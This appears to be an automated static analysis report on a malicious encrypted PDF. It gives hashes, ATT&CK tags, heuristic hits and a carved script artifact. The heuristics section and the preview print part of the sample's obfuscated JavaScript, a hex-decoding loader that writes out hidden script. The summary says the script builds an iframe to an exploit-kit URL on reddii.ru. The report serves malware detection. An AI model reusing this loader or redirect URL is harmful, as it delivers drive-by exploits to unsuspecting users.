Malicious PDF — malware analysis report

Static analysis result for SHA-256 afb903014a6bc90f…

Verdict: MALICIOUS
File type: PDF
Size: 1.6 KB
First seen: 2026-05-10
MD5: 331f950a3b4e679810a0d8c90d441eba
SHA-1: ea076bdd40313f2b40c2d732a0f564accd82562e
SHA-256: afb903014a6bc90f35a6e578d45fb1c6eac37713ec1425078b5ac3597c901a3a
Risk Score: 60

Malware Insights

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1566.002 Spearphishing Attachment

The PDF is encrypted, but static analysis revealed an embedded script payload. The script, when decoded, constructs an iframe pointing to 'http://reddii.ru/traffic/sployt1/sp1.php?'+Math.round(Math.random()*11845)+'. This indicates the PDF is likely a lure to redirect the user to a malicious site, potentially for further exploitation or credential harvesting.

Machine Learning

  • Nyx PDF Classifier: malicious score 0.9994

Heuristics (3)

  • Embedded script payload in PDF stream (severity: medium) PDF_EMBEDDED_SCRIPT_PAYLOAD
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • String.fromCharCode (severity: low) PDF_FROMCHARCODE
    String.fromCharCode found — used to construct payload strings dynamically. Common in benign JavaScript libraries for codepoint manipulation, so this alone is informational; weaponised use is also caught by the dedicated fromCharCode-stage and exploit-shape rules.
    Matched line in script:
    endobj
    19 0 obj<</R 2/Length 40/Filter/Standard/O(²½ î\)ùIª$ Éo \n ÙãÉÉ Y Ù} Å} -§jÓ)/P -60/U(æOr[ ` 7Ö³"9ðZËÒØM<script>function vbYbdxtdtxd(vtydbdadxax){  return(parseInt(vtydbdadxax,16));}function vxVtydaabba(vayaVVabdYY){  var vVatbayydtY='';for(vxtYxdydYYV=0; vxtYxdydYYV<vayaVVabdYY.length; vxtYxdydYYV+=2){vVatbayydtY+=(String.fromCharCode(vbYbdxtdtxd(vayaVVabdYY.substr(vxtYxdydYYV,2))));}return vVatbayydtY;} document.write(vxVtydaabba('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F …
  • Encrypted PDF (string and stream contents are opaque to static scan) (severity: info) PDF_ENCRYPTED
    PDF declares /Encrypt — string objects and stream contents are encrypted with the standard security handler (RC4 or AES). On its own this is informational; legitimate encrypted documents include signed contracts, billing statements, and rights-managed material. Static heuristics cannot inspect encrypted payload bytes.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: embedded_pdf_script_00000325.bin
Kind: pdf-embedded-script
Source: PDF decompressed stream, script payload at offset 0x325
Size: 58 bytes
SHA-256: a7c962ec478d5348e3cd62abde37058c6ff2a011fcf4e46b79217e98b417a57a
Preview script (first 1,000 lines of the extracted script):
�Or[�` 7ֳ"9�Z���M<script>function vbYbdxtdtxd(vtydbdadxax